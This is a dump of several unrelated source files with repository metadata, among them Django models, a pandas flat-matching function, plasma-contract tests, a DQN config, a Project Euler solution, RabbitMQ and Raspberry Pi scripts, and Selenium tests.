document = models.ForeignKey(Document)
file = models.FileField(verbose_name=_("File"), upload_to="documents/")
datetime = models.DateTimeField(auto_now_add=True)
def __str__(self):
return self.file.name
@property
def filename(self):
return self.file.name.split("/")[-1]
@property
def type(self):
return DocumentType.get_type_from_name(self.file.name)
@property
def icon(self):
return {
DocumentType.FILE: "fa-file-o",
DocumentType.EXCEL: "fa-file-excel-o",
DocumentType.PDF: "fa-file-pdf-o",
DocumentType.SOUND: "fa-file-sound-o",
DocumentType.TEXT: "fa-file-text-o",
DocumentType.ARCHIVE: "fa-file-archive-o",
DocumentType.WORD: "fa-file-word-o",
DocumentType.IMAGE: "fa-file-image-o",
DocumentType.VIDEO: "fa-file-video-o",
DocumentType.POWERPOINT: "fa-file-powerpoint-o",
}.get(self.type, "fa-file-o")
@property
def permalink(self):
return self.document.data_permalink(self)
class DocumentEditMeta(models.Model):
class Status:
ACTIVE = '0'
ACCEPTED = '1'
REJECTED = '2'
editor = models.ForeignKey(User)
closed_by = models.ForeignKey(User, related_name="accepted_by", null=True)
start_datetime = models.DateTimeField(auto_now_add=True)
end_datetime = models.DateTimeField(null=True, default=None)
document = models.ForeignKey(Document)
previous_document_data = models.ForeignKey(DocumentData, null=True)
status = models.CharField(max_length=1, default=Status.ACTIVE)
@property
def is_accepted(self):
return self.status == DocumentEditMeta.Status.ACCEPTED
@property
def is_rejected(self):
return self.status == DocumentEditMeta.Status.REJECTED
@property
def is_active(self):
return self.status == DocumentEditMeta.Status.ACTIVE
@property
def time_spent(self):
return self.end_datetime - self.start_datetime
@property
def css_class(self):
return {
DocumentEditMeta.Status.ACCEPTED: " accepted",
DocumentEditMeta.Status.REJECTED: " rejected",
}.get(self.status, "")
class ActiveRemarkManager(models.Manager):
def get_queryset(self):
return super().get_queryset().filter(edit_meta__status=DocumentEditMeta.Status.ACTIVE)
class Remark(models.Model):
class Status:
ACTIVE = '0'
ACCEPTED = '1'
REJECTED = '2'
FINISHED = '3'
class Meta:
ordering = ["-datetime"]
edit_meta = models.ForeignKey(DocumentEditMeta)
user = models.ForeignKey(User)
text = models.TextField()
datetime = models.DateTimeField(auto_now_add=True)
status = models.CharField(max_length=1, default=Status.ACTIVE)
objects = models.Manager()
active_objects = ActiveRemarkManager()
@property
def is_accepted(self):
return self.status == Remark.Status.ACCEPTED
@property
def is_rejected(self):
return self.status == Remark.Status.REJECTED
@property
def is_finished(self):
return self.status == Remark.Status.FINISHED
@property
def is_active(self):
return self.status == Remark.Status.ACTIVE
@property
def css_class(self):
return {
Remark.Status.ACCEPTED: " accepted",
Remark.Status.REJECTED: " rejected",
Remark.Status.FINISHED: " finished",
}.get(self.status, "")
|
[
"andrey@kabylin.ru"
] |
andrey@kabylin.ru
|
d236bdab51964f1b98c45cd97d55bfe8fd1906dd
|
0ac82bac6bb500623eeddca565e3ea0191de072b
|
/python-scripts/flat_match.py
|
956dcd98118ac65a63c6ee4d1899f9f389c0387d
|
[
"MIT"
] |
permissive
|
CreateCodeLearn/flat-mate-matching
|
e665294ac1e79708fa52bbbbc6573e2abb78c697
|
1c4a4f03927dfc5f8d98b4db66b840a7ee847d7b
|
refs/heads/master
| 2020-03-15T12:16:16.257308
| 2018-05-24T08:20:28
| 2018-05-24T08:20:28
| 132,140,134
| 1
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,003
|
py
|
def flat_match (v_location,v_gender,v_rent,v_lowerage,v_upperage, filepath):
'''
Provides the dataset in CSV and based on input data uses booleans
to subset the data to give the flats ranked according rent with cheapest
showing first
'''
import pandas as pd
def transform_data(dataframe):
dd = dict()
index = dataframe.sort_values("rent").index.tolist()
for i in index:
dd[i] = dataframe.loc[i].to_dict()
return dd, index
data = pd.read_csv(filepath, index_col=0)
boolean_location = data["location"] == v_location
boolean_gender = data["gender"] == v_gender
boolean_rent = data["rent"] <= v_rent
boolean_upperage = data["lowerage"] >= v_lowerage
boolean_upperage = data["upperage"] <= v_upperage
user_constraints = boolean_location & boolean_gender & boolean_rent & boolean_lowerage & boolean_upperage
results = data.loc[user_constraints]
return transform_data(results)
|
[
"noreply@github.com"
] |
CreateCodeLearn.noreply@github.com
|
f570414052c45b26663ca047212e6d74bac2ae67
|
99411511cd49a3f0c1c2de7dc9cc65adac6b82b5
|
/tests/contracts/root_chain/test_respond_to_non_canonical_challenge.py
|
ea70d78d7e4571c15aaa1674d1dc7af349fa1e9e
|
[
"Apache-2.0"
] |
permissive
|
kevsul/plasma-contracts
|
f4b1a7b08d4b4fc4e62024c2f2c8794407c9c968
|
bf5ff1db154ba4807ac747430508f0e1aac1827a
|
refs/heads/master
| 2020-04-17T23:15:13.204840
| 2019-01-08T12:43:11
| 2019-01-08T12:43:11
| 167,028,074
| 0
| 0
| null | 2019-01-22T16:32:10
| 2019-01-22T16:32:09
| null |
UTF-8
|
Python
| false
| false
| 3,038
|
py
|
import pytest
from ethereum.tools.tester import TransactionFailed
def test_respond_to_non_canonical_challenge_should_succeed(testlang):
owner_1, owner_2, amount = testlang.accounts[0], testlang.accounts[1], 100
deposit_id = testlang.deposit(owner_1, amount)
spend_id = testlang.spend_utxo([deposit_id], [owner_1.key])
double_spend_id = testlang.spend_utxo([deposit_id], [owner_1.key], [(owner_1.address, 100)], force_invalid=True)
testlang.start_in_flight_exit(spend_id)
testlang.challenge_in_flight_exit_not_canonical(spend_id, double_spend_id, key=owner_2.key)
testlang.forward_to_period(2)
testlang.respond_to_non_canonical_challenge(spend_id, owner_1.key)
in_flight_exit = testlang.get_in_flight_exit(spend_id)
assert in_flight_exit.bond_owner == owner_1.address
assert in_flight_exit.oldest_competitor == spend_id
assert not in_flight_exit.challenge_flag_set
def test_respond_to_non_canonical_challenge_wrong_period_should_fail(testlang):
owner_1, owner_2, amount = testlang.accounts[0], testlang.accounts[1], 100
deposit_id = testlang.deposit(owner_1, amount)
spend_id = testlang.spend_utxo([deposit_id], [owner_1.key])
double_spend_id = testlang.spend_utxo([deposit_id], [owner_1.key], [(owner_1.address, 100)], force_invalid=True)
testlang.start_in_flight_exit(spend_id)
testlang.challenge_in_flight_exit_not_canonical(spend_id, double_spend_id, key=owner_2.key)
with pytest.raises(TransactionFailed):
testlang.respond_to_non_canonical_challenge(spend_id, owner_1.key)
def test_respond_to_non_canonical_challenge_not_older_should_fail(testlang):
owner_1, owner_2, amount = testlang.accounts[0], testlang.accounts[1], 100
deposit_id = testlang.deposit(owner_1, amount)
double_spend_id = testlang.spend_utxo([deposit_id], [owner_1.key], [(owner_1.address, 100)], force_invalid=True)
spend_id = testlang.spend_utxo([deposit_id], [owner_1.key])
testlang.start_in_flight_exit(spend_id)
testlang.challenge_in_flight_exit_not_canonical(spend_id, double_spend_id, key=owner_2.key)
testlang.forward_to_period(2)
with pytest.raises(TransactionFailed):
testlang.respond_to_non_canonical_challenge(spend_id, owner_1.key)
def test_respond_to_non_canonical_challenge_invalid_proof_should_fail(testlang):
owner_1, owner_2, amount = testlang.accounts[0], testlang.accounts[1], 100
deposit_id = testlang.deposit(owner_1, amount)
spend_id = testlang.spend_utxo([deposit_id], [owner_1.key])
double_spend_id = testlang.spend_utxo([deposit_id], [owner_1.key], [(owner_1.address, 100)], force_invalid=True)
testlang.start_in_flight_exit(spend_id)
testlang.challenge_in_flight_exit_not_canonical(spend_id, double_spend_id, key=owner_2.key)
testlang.forward_to_period(2)
spend_tx = testlang.child_chain.get_transaction(spend_id)
proof = b''
with pytest.raises(TransactionFailed):
testlang.root_chain.respondToNonCanonicalChallenge(spend_tx.encoded, spend_id, proof)
|
[
"paulperegud@gmail.com"
] |
paulperegud@gmail.com
|
33a2b6d8f45d37885f4a4c19d96c4da8aeaf0512
|
403ec432fa5b6e5e8f516057517700defa69dbdf
|
/scripts/miyashita/rv_miyashita.py
|
82ad931b0bbcc23125020e70ea58e0d96dafbb73
|
[] |
no_license
|
takatoy/marl
|
a264d0cc7aef057f255a192c19feddb70d65a5e1
|
1f36e3432fd4150ce8acebc4aa0f31edde315e99
|
refs/heads/master
| 2022-12-24T06:27:14.712655
| 2019-08-16T12:46:25
| 2019-08-16T12:46:25
| 153,779,283
| 0
| 0
| null | 2022-12-08T05:50:24
| 2018-10-19T12:27:38
|
Python
|
UTF-8
|
Python
| false
| false
| 1,314
|
py
|
from agent.trainer import Trainer
from agent.util import EpsilonExponentialDecay
from marlenv.goldmine.relative import GoldmineRV
from marlenv.util import GoldmineRecorder
from agent.deepq.miyashita_dqn import MiyashitaDQN
agent_num = 6
task_num = 4
view_range = 3
env = GoldmineRV(agent_num, task_num, view_range)
env.seed(0)
params = {
'name' : 'rv_miyashita',
'episodes' : 40000,
'steps' : 200,
'no_op_episodes' : 100,
'epsilon' : EpsilonExponentialDecay(init=1.0, rate=0.9999),
'train_every' : 1,
'save_model_every' : 1000,
'is_centralized' : False,
'agent_num' : agent_num,
'env' : env,
'action_space' : env.action_space,
'observation_space' : env.observation_space,
'preprocess' : None,
'recorder' : GoldmineRecorder(agent_num),
'agent': [
MiyashitaDQN(
action_space = env.action_space,
observation_space = env.observation_space,
memory_size = 2000,
batch_size = 32,
learning_rate = 0.0001,
gamma = 0.99,
target_update = 200
) for _ in range(agent_num)
]
}
trainer = Trainer(**params)
trainer.train()
|
[
"takato.y7724@gmail.com"
] |
takato.y7724@gmail.com
|
d2f1ca8708def6c418e18082ca194d3ef9cbfc41
|
a83dcfb3c55f5d447aa9fd4ffe49b96dfb04a872
|
/euler_problem_115.py
|
ab5c35694d96e0d49de37f5ea28c07fcef45fe0b
|
[] |
no_license
|
SinghGauravKumar/Project-Euler-Python-Solutions
|
bb7590498c427d50446a6a0c57c0dd545c1db770
|
1664f51e89e4021048fbd1949a4622822a46c747
|
refs/heads/master
| 2020-02-26T17:00:20.303071
| 2016-07-11T15:47:47
| 2016-07-11T15:47:47
| 53,360,338
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 982
|
py
|
import itertools
# How many ways can a row n units long be filled, where red blocks are
# at least m units long? Denote this quantity as ways[n].
# Compute n = 0 manually as a base case.
#
# Now assume n >= 1. Look at the leftmost item and sum up the possibilities.
# - If the item is a black square, then the rest of the row is allowed
# to be anything of length n-1. Add ways[n-1].
# - If the item is a red block with length k where k >= m, then:
# - If k = n, then the whole row is filled by this red block. Add 1.
# - Otherwise k < n, this red block is followed by a black square, then followed
# by anything of length n-k-1. So add ways[n-m-1] + ways[n-m-2] + ... + ways[0].
def compute():
# Dynamic programming
M = 50
ways = [1]
for n in itertools.count(1):
s = ways[n - 1] + sum(ways[ : max(n - M, 0)])
if n >= M:
s += 1
ways.append(s)
if s > 1000000:
return str(n)
if __name__ == "__main__":
print(compute())
|
[
"goroo32@users.noreply.github.com"
] |
goroo32@users.noreply.github.com
|
2e7583da1b5353128ab7e08dcaadc791b41711b8
|
7616db78302026eca05e3064d237db5192be3440
|
/Testing.py
|
7a09dcbc2383ad054ce294a3dcb12458a662e872
|
[] |
no_license
|
MaartenMol/CSN_MiniProject
|
66cb9ac37e87061832a8123dbc7d2d96344bf174
|
fe52a902c6ced798fd548cc80ac5b81a8beaf6f9
|
refs/heads/master
| 2021-03-30T02:18:40.133190
| 2016-11-10T13:16:27
| 2016-11-10T13:16:27
| 117,237,636
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 901
|
py
|
import RPi.GPIO as gpio
from gpiozero import LED
from time import sleep
gpio.setmode(gpio.BCM)
gpio.setup(17, gpio.IN)
gpio.setup(27, gpio.IN)
gpio.setup(19, gpio.IN)
gpio.setup(5, gpio.IN)
gpio.setup(6, gpio.IN)
green = LED(4)
red = LED(26)
yellow = LED(22)
bolb = LED(13)
yellow.on()
systemActivted = False
while True:
input_knop1 = gpio.input(17)
input_knop2 = gpio.input(27)
input_knop3 = gpio.input(5)
input_knop4 = gpio.input(6)
input_motion = gpio.input(19)
if input_knop1 == True:
print('Systeem is geactiveerd!')
green.blink()
sleep(5)
systemActivted = True
green.off()
green.on()
if input_motion == True:
print('Beweging gedecteerd...')
if systemActivted == True:
authKey = input('Voer uw toegangscode in: ')
yellow.blink()
|
[
"MaartenMol96@users.noreply.github.com"
] |
MaartenMol96@users.noreply.github.com
|
763bc377b5aa603e4aec1dc21746813f46af06e9
|
a3614055b6c58b0f6aeabb77cb463f2503d77fa3
|
/demo/iconnector.py
|
f635497f9b11ec55bb4ef5a1c5ef79a2e96e62ca
|
[] |
no_license
|
ruarcs/iverifier
|
21d152909ae80c5eb0bbbc78d1dc594258cf9436
|
961639e7db9e63f304aba5746e3a7e9f02c1706e
|
refs/heads/master
| 2021-01-10T04:33:48.593703
| 2015-06-05T16:19:51
| 2015-06-05T16:19:51
| 36,872,414
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 129
|
py
|
from zope.interface import Interface
class IConnector(Interface):
def connect( port ):
"""Connect to the thing."""
|
[
"ruarcs@gmail.com"
] |
ruarcs@gmail.com
|
b4e7ae515980d8b17b6d2d43e99838f7887a26d1
|
ff2772718882aa6035edde3dc97371455513d96d
|
/CSCI466/code/program3/link_3.py
|
d2e99b87bb741bb66ce970527efa556ef8a8218c
|
[
"MIT"
] |
permissive
|
Dan-Laden/Dan-Laden-Projects
|
55eefa60f3a1bd5c1e51aa54ca0bab63c32a4e64
|
c9736e7baa25ef4f7272af462a956884605a1b40
|
refs/heads/master
| 2021-03-27T15:54:23.206820
| 2019-04-27T02:44:23
| 2019-04-27T02:44:23
| 55,929,569
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,637
|
py
|
'''
Created on Oct 12, 2016
@author: mwitt_000
'''
import queue
import threading
## An abstraction of a link between router interfaces
class Link:
## creates a link between two objects by looking up and linking node interfaces.
# @param from_node: node from which data will be transfered
# @param from_intf_num: number of the interface on that node
# @param to_node: node to which data will be transfered
# @param to_intf_num: number of the interface on that node
# @param mtu: link maximum transmission unit
def __init__(self, from_node, from_intf_num, to_node, to_intf_num, mtu):
self.from_node = from_node
self.from_intf_num = from_intf_num
self.to_node = to_node
self.to_intf_num = to_intf_num
self.in_intf = from_node.out_intf_L[from_intf_num]
self.out_intf = to_node.in_intf_L[to_intf_num]
#configure the linking interface MTUs
self.in_intf.mtu = mtu
self.out_intf.mtu = mtu
## called when printing the object
def __str__(self):
return 'Link %s-%d to %s-%d' % (self.from_node, self.from_intf_num, self.to_node, self.to_intf_num)
##transmit a packet from the 'from' to the 'to' interface
def tx_pkt(self):
pkt_S = self.in_intf.get()
if pkt_S is None:
return #return if no packet to transfer
if len(pkt_S) > self.out_intf.mtu:
print('%s: packet "%s" length greater then link mtu (%d)' % (self, pkt_S, self.out_intf.mtu))
return #return without transmitting if packet too big
#otherwise transmit the packet
try:
self.out_intf.put(pkt_S)
print('%s: transmitting packet "%s"' % (self, pkt_S))
except queue.Full:
print('%s: packet lost' % (self))
pass
## An abstraction of the link layer
class LinkLayer:
def __init__(self):
## list of links in the network
self.link_L = []
self.stop = False #for thread termination
##add a Link to the network
def add_link(self, link):
self.link_L.append(link)
##transfer a packet across all links
def transfer(self):
for link in self.link_L:
link.tx_pkt()
## thread target for the network to keep transmitting data across links
def run(self):
print (threading.currentThread().getName() + ': Starting')
while True:
#transfer one packet on all the links
self.transfer()
#terminate
if self.stop:
print (threading.currentThread().getName() + ': Ending')
return
|
[
"noreply@github.com"
] |
Dan-Laden.noreply@github.com
|
2ece9d6b3674f5b1dcc80ebda708f895af2fee70
|
57fd1088943c36f8283514d1b778c83af99ea054
|
/Python 1/Exemplos/Semana 2.py
|
a236823905f82e02efe55d59d07e2f8cd05b6fe9
|
[
"MIT"
] |
permissive
|
LourdesOshiroIgarashi/coursera-ime-usp
|
db6c36c8505bca9660718c94f96c552a9f595a0c
|
9e627acdf97fad834726e58eac8886663c8fa453
|
refs/heads/main
| 2023-06-20T10:39:56.670219
| 2021-07-21T06:26:32
| 2021-07-21T06:26:32
| 385,691,500
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 235
|
py
|
mae = input("Qual o nome da sua mãe?")
pai = input("Qual o nome do seu pai?")
print("Bom dia Sra.",mae, "! E bom dia Sr.",pai,"."
""
|
[
"lourdes.oshiro@ufms.br"
] |
lourdes.oshiro@ufms.br
|
2504fde45eeec1f9d902c49e883d0b81e107deb6
|
f9d564f1aa83eca45872dab7fbaa26dd48210d08
|
/huaweicloud-sdk-hss/huaweicloudsdkhss/v5/model/handle_method.py
|
d642224bff61bc6d689fecc1921ef1247b0c5800
|
[
"Apache-2.0"
] |
permissive
|
huaweicloud/huaweicloud-sdk-python-v3
|
cde6d849ce5b1de05ac5ebfd6153f27803837d84
|
f69344c1dadb79067746ddf9bfde4bddc18d5ecf
|
refs/heads/master
| 2023-09-01T19:29:43.013318
| 2023-08-31T08:28:59
| 2023-08-31T08:28:59
| 262,207,814
| 103
| 44
|
NOASSERTION
| 2023-06-22T14:50:48
| 2020-05-08T02:28:43
|
Python
|
UTF-8
|
Python
| false
| false
| 2,294
|
py
|
# coding: utf-8
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class HandleMethod:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
}
attribute_map = {
}
def __init__(self):
"""HandleMethod
The model defined in huaweicloud sdk
"""
self.discriminator = None
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, HandleMethod):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"hwcloudsdk@huawei.com"
] |
hwcloudsdk@huawei.com
|
fdaa80a08a01556a86bb3ba7f86d2de920f0c9ec
|
27b2a3966518ef064e4f645af8addac4e74428a8
|
/Routing/receive_logs_direct.py
|
aad7e66793432419960663b2b30395de7fbe6e9b
|
[] |
no_license
|
Eliza0512/rabbitmq
|
592a04d1759e9c34f4fc0013ee7fa7cedb09c78c
|
86a9f06d178a53b08120e57fc1a7d5e2f69d7e7c
|
refs/heads/master
| 2020-05-17T08:21:33.412447
| 2019-04-26T09:49:39
| 2019-04-26T09:49:39
| 183,603,112
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 886
|
py
|
#!/usr/bin/env python
import pika
import sys
connection = pika.BlockingConnection(
pika.ConnectionParameters(host='localhost'))
channel = connection.channel()
channel.exchange_declare(exchange='direct_logs', exchange_type='direct')
## channel closed queue close
result = channel.queue_declare('', exclusive=True)
queue_name = result.method.queue
severities = sys.argv[1:]
if not severities:
sys.stderr.write("Usage: %s [info] [warning] [error]\n" % sys.argv[0])
sys.exit(1)
for severity in severities:
channel.queue_bind(
exchange='direct_logs', queue=queue_name, routing_key=severity)
print(' [*] Waiting for logs. To exit press CTRL+C')
def callback(ch, method, properties, body):
print(" [x] %r:%r" % (method.routing_key, body))
channel.basic_consume(
queue=queue_name, on_message_callback=callback, auto_ack=True)
channel.start_consuming()
|
[
"wangyongjia@corp-ci.com"
] |
wangyongjia@corp-ci.com
|
1c168dc139da5500467945e5d6b71200e52634b0
|
f27e3a898747d54db1a0c2fa84a72a1ddbf0e785
|
/AudioAnalysisPart/analyse.py
|
dd7b5bd6da0a9d822b8b7558869f9eca8d3aafda
|
[] |
no_license
|
emailandxu/rhythmaticc
|
602aabf94b0c8d360f64004234261606b56ed23d
|
c1edbfe5bf9cc7b70305ca188415424d057060a4
|
refs/heads/master
| 2023-03-21T08:08:31.320700
| 2020-10-27T12:44:11
| 2020-10-27T12:44:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,877
|
py
|
import argparse
import multiprocessing
import os
import time
from madmom.features.beats import RNNBeatProcessor, MultiModelSelectionProcessor, DBNBeatTrackingProcessor
from madmom.features.notes import RNNPianoNoteProcessor, NotePeakPickingProcessor
from madmom.features.onsets import CNNOnsetProcessor, OnsetPeakPickingProcessor
from madmom.features.tempo import TempoEstimationProcessor
from madmom.io.audio import load_ffmpeg_file
from madmom.audio import SignalProcessor
from madmom.processors import SequentialProcessor, ParallelProcessor, IOProcessor
if __name__ == '__main__':
multiprocessing.freeze_support()
parser = argparse.ArgumentParser()
parser.add_argument('filename')
parser.add_argument('-ot', '--othreshold', type=float, default=1.35)
parser.add_argument('-pt', '--pthreshold', type=float, default=0.35)
parser.add_argument('-o', '--onsets-only', action='store_true')
parser.add_argument('-b', '--beats-only', action='store_true')
args = parser.parse_args()
selector = MultiModelSelectionProcessor(None)
rnn_beat_processor = RNNBeatProcessor(post_processor=selector)
fps = 100
pre_max = 1. / fps
post_max = 1. / fps
onset_peak_processor = OnsetPeakPickingProcessor(threshold=args.othreshold, smooth=0.05, fps=fps, pre_max=pre_max,
post_max=post_max)
cnn_processor = CNNOnsetProcessor(fps=fps, pre_max=pre_max, post_max=post_max)
beat_processor = DBNBeatTrackingProcessor(min_bpm=80, max_bpm=210, fps=100)
SignalProcessor.add_arguments(parser, norm=False, gain=0)
note_processor = RNNPianoNoteProcessor()
peak_picking = NotePeakPickingProcessor(threshold=args.pthreshold, smooth=0.05, combine=0.03, fps=fps, pre_max=pre_max, post_max=post_max, delay=0)
seq1 = IOProcessor([cnn_processor, onset_peak_processor])
seq2 = SequentialProcessor([rnn_beat_processor, beat_processor])
seq3 = SequentialProcessor([note_processor, peak_picking])
audiofile, sample_rate = load_ffmpeg_file(args.filename, cmd_decode='./ffmpeg.exe', cmd_probe='./ffprobe.exe', sample_rate=44100)
start_time = time.time()
global onsets_result
onsets_string = ''
beats_string = ''
cpu_count = 1
if os.cpu_count() > 3:
cpu_count = 4
elif os.cpu_count() > 1:
cpu_count = 2
if args.beats_only:
beats_result = seq2.process(audiofile)
beats_string = ','.join(['%.2f' % num for num in beats_result])
beats_string = 'b:' + beats_string
elif args.onsets_only:
parallels_processors = ParallelProcessor([seq1, seq3], cpu_count)
onsets_result = parallels_processors.process(audiofile)
# filter onsets
onsets_string = 'o:'
for onset in onsets_result[0]:
onsets_string += '{:.2f}'.format(onset) + ';'
for note in onsets_result[1]:
if abs(note[0] - onset) < 0.02:
onsets_string += '{:.0f}'.format(note[1]) + '+'
onsets_string += ','
print('c:' + str(len(onsets_result[0])) + '\n')
else:
parallels_processors = ParallelProcessor([seq1, seq2, seq3], cpu_count)
onsets_beats_result = parallels_processors.process(audiofile)
# filter onsets
onsets_string = 'o:'
for onset in onsets_beats_result[0]:
onsets_string += '{:.2f}'.format(onset) + ';'
for note in onsets_beats_result[2]:
if abs(note[0] - onset) < 0.02:
onsets_string += '{:.0f}'.format(note[1]) + '+'
onsets_string += ','
beats_string = ','.join(['%.2f' % num for num in onsets_beats_result[1]])
beats_string = 'b:' + beats_string
output_text = onsets_string + '\n' + beats_string + '\n' + "t:%s" % (time.time() - start_time)
print(output_text, flush=True)
|
[
"thanik@gmail.com"
] |
thanik@gmail.com
|
653d4cfe9ba35da08cbe76dc1fd34e0b309c6069
|
62c82e9364b4605897c5118df8865047e6dd10e4
|
/python/tests.py
|
08b724e6fb82e60249cd71cbef3b6e1f2a557063
|
[] |
no_license
|
piter0900/programming-challenge
|
e1d32c816cb0f928b39c848977f396a94d06c704
|
fe3829da980dcb9f5b0b5b44206000465ea962fb
|
refs/heads/master
| 2020-03-23T13:37:48.124062
| 2018-07-19T20:39:29
| 2018-07-19T20:39:29
| 141,628,370
| 0
| 0
| null | 2018-07-19T20:36:46
| 2018-07-19T20:36:46
| null |
UTF-8
|
Python
| false
| false
| 1,717
|
py
|
# Write unit tests here
import unittest
from nomnom import how_many_servings
class test_how_many_servings(unittest.TestCase):
def test_no_recepie(self):
recipe={}
inventory={'bread': 20,'peanutButter': 10,'jam': 5}
self.assertEqual(how_many_servings(recipe,inventory), "something is missing")
def test_no_inventory(self):
recipe={'bread': 10,'peanutButter': 5,'jam': 5}
inventory={}
self.assertEqual(how_many_servings(recipe,inventory), "something is missing")
def test_0_in_recipie(self):
recipe={'bread': 10,'peanutButter': 5,'jam': 0}
inventory={'bread': 20,'peanutButter': 10,'jam': 5}
self.assertEqual(how_many_servings(recipe,inventory), 2)
def test_0_in_inventory(self):
recipe={'bread': 10,'peanutButter': 5,'jam': 5}
inventory={'bread': 20,'peanutButter': 10,'jam': 0}
self.assertEqual(how_many_servings(recipe,inventory), 0)
def test_missing_items_in_recipie(self):
recipe={'bread': 10,'peanutButter': 5}
inventory={'bread': 20,'peanutButter': 10,'jam': 5}
self.assertEqual(how_many_servings(recipe,inventory), 2)
def test_missing_items_in_inventory(self):
recipe={'bread': 10,'peanutButter': 5,'jam': 5}
inventory={'bread': 20,'peanutButter': 10}
self.assertEqual(how_many_servings(recipe,inventory), "something is missing")
def test_not_enough_for_1(self):
recipe={'bread': 10,'peanutButter': 5,'jam': 5}
inventory={'bread': 20,'peanutButter': 10,'jam': 4}
self.assertEqual(how_many_servings(recipe,inventory), 0)
def test_1(self):
recipe={'bread': 10,'peanutButter': 5,'jam': 5}
inventory={'bread': 200,'peanutButter': 100,'jam': 50}
self.assertEqual(how_many_servings(recipe,inventory), 10)
if __name__ == '__main__':
unittest.main()
|
[
"noreply@github.com"
] |
piter0900.noreply@github.com
|
048e7b93b91969e1154c8374e3a18e35e331d941
|
2aca24a9306b864a6c69f80af2500dd6c15bedc0
|
/testproject/classok.py
|
a0bc1a93ce5792cbf206de1b23adad6412bbca34
|
[] |
no_license
|
kincsesl/vizsgaremek_jo
|
cb265c06d15463fd50aa25308a64a8d3a464779b
|
bdd2156d0adf905c4d88fdeb0a5d0590facdbd65
|
refs/heads/main
| 2023-07-05T15:23:54.488144
| 2021-08-05T08:28:18
| 2021-08-05T08:28:18
| 392,580,315
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,002
|
py
|
import time
import lokatorok
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
class TestSign_upLap(object):
def setup(self):
self.options = Options()
#self.options.headless = True
self.driver = webdriver.Chrome(options=self.options)
self.driver.get(lokatorok.signuplap)
self.username = self.driver.find_element_by_xpath(lokatorok.username)
self.emil = self.driver.find_element_by_xpath(lokatorok.emil)
self.password = self.driver.find_element_by_xpath(lokatorok.password)
self.submit = self.driver.find_element_by_xpath(lokatorok.submit) # Sign up felirat.
def teardown(self): # Lerombolás.
pass
#self.driver.close()
def hibaablak(self):
self.felirat = self.driver.find_element_by_xpath(lokatorok.failed)
self.reszlet = self.driver.find_element_by_xpath(lokatorok.reszlet)
self.failed_okgomb = self.driver.find_element_by_xpath(lokatorok.failed_okgomb)
# self.userhiba = locators.userhiba # 4 elemű lista.
def sikerablak(self):
self.welcome = self.driver.find_element_by_xpath(lokatorok.welcome)
self.successful = self.driver.find_element_by_xpath(lokatorok.successful)
self.successful_okgomb = self.driver.find_element_by_xpath(lokatorok.successful_okgomb)
def test_01_rossz_mezok(self, a, b, c, d):
if a == "":
self.submit.click()
elif b == "":
self.username.send_keys(a)
self.submit.click()
elif c == "":
self.username.send_keys(a)
self.emil.send_keys(b)
self.submit.click()
else:
self.username.send_keys(a)
self.emil.send_keys(b)
self.password.send_keys(c)
self.submit.click()
time.sleep(1)
self.hibaablak()
log = self.reszlet.text == d
self.failed_okgomb.click()
self.driver.close()
return log
|
[
"kincsesster@gmail.com"
] |
kincsesster@gmail.com
|
d50fec7fa806049d2ec7122534c7a7070982a7eb
|
898e853fdec3d6aceef4a4cec29cf0cb8ad1b987
|
/lists/looping_through_a_list.py
|
bb368c9650f04c8b1ccfbc1bd364ce52ff1c720d
|
[] |
no_license
|
nadiauddin/python-practise
|
85b8b4281f1d14ee8cf5f56232e81feb08b77b06
|
53b10d634297df183aba5e84b4c728da8f3a1761
|
refs/heads/master
| 2022-08-30T09:08:44.605120
| 2020-05-08T16:11:04
| 2020-05-08T16:11:04
| 256,231,016
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 668
|
py
|
# 04/02/2020
# Nadia Uddin
# Looping through a list
# used to carry out the same operation to all elements in a list
months = ['january', 'february', 'march', 'april', 'may', 'june', 'july', 'august', 'september', 'october', 'november', 'december']
print(months[0])
# using a for loop to print a list
# for first element in list
# the for loop will repeat the process until the end - a process of elimination
for month in months:
print(month.title() + "\n")
print("The next month is ")
print("Goodbye!")
# anything more written in the indent even on a new line would be considered in the loop
# so each indented line is executed for each element in the list
|
[
"noreply@github.com"
] |
nadiauddin.noreply@github.com
|
06df2a6c5231371a9158b2c2e65dccda51111807
|
7c9fb1ceb09a47c4eb03d0e07f70137ad5c2de60
|
/615.py
|
a2149e542b3015d951b8048b9865ab5fea9b91f9
|
[] |
no_license
|
SensenLiu123/Lintcode
|
0472838f333bfceabb00b2b1b8cdbf3a4ee386d8
|
11b8ef0f9808ca3d2d08a342bfdba2441840d2f6
|
refs/heads/master
| 2020-05-16T01:36:48.797544
| 2019-09-26T05:02:39
| 2019-09-26T05:02:39
| 182,605,746
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,708
|
py
|
